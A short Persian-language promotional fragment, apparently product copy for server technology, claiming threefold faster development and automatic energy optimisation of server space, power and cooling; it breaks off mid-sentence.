۳ برابر سریعتر در توسعه. بهینه سازی انرژی به صورت خودکار: این قابلیت به صورت هوشمندانه، استفاده از فضا، قدرت و خنک کنندگی قطعات سرور را به حداکثر می‌رساند. افزایش حجم کار […]